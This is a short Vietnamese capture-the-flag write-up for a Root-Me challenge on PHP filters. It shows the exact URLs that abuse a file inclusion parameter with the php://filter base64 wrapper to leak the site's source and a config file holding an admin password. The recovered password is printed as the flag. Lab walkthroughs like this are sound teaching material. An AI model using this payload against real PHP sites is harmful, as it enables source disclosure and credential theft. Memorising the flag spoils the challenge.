# PHP filters

Ta sẽ sử dụng wrapper filter của PHP:

`php://filter/convert.base64-encode/resource`

Ban đầu, vào URL như sau:

`http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=index.php`

Ta có đoạn code base64: `PD9waHAgaW5jbHVkZSgiY2gxMi5waHAiKTs/Pg==`, decode, ta có:

`<?php include("ch12.php");?>`

Sửa lại URL: `http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=ch12.php`

Ta lại thu được một đoạn base64 dài, decode ra được:

```
<?php\n\n$inc="accueil.php";\nif (isset($_GET["inc"])) {\n    $inc=$_GET[\'inc\'];\n    if (file_exists($inc)){\n\t$f=basename(realpath($inc));\n\tif ($f == "index.php" || $f == "ch12.php"){\n\t    $inc="accueil.php";\n\t}\n    }\n}\n\ninclude("config.php");\n\n\necho \'\n  <html>\n  <body>\n    <h1>FileManager v 0.01</h1>\n    <ul>\n\t<li><a href="?inc=accueil.php">home</a></li>\n\t<li><a href="?inc=login.php">login</a></li>\n    </ul>\n\';\ninclude($inc);\n\necho \'\n  </body>\n  </html>\n\';\n\n\n?>
```

Chưa có gì cả, nhưng có file mới tên là config.php

Lại đưa nó vào resource xong decode base64, ta ra:

```
<?php\n\n$username="admin";\n$password="DAPt9D2mky0APAF";\n\n?>
```

---

### Flag:

`DAPt9D2mky0APAF`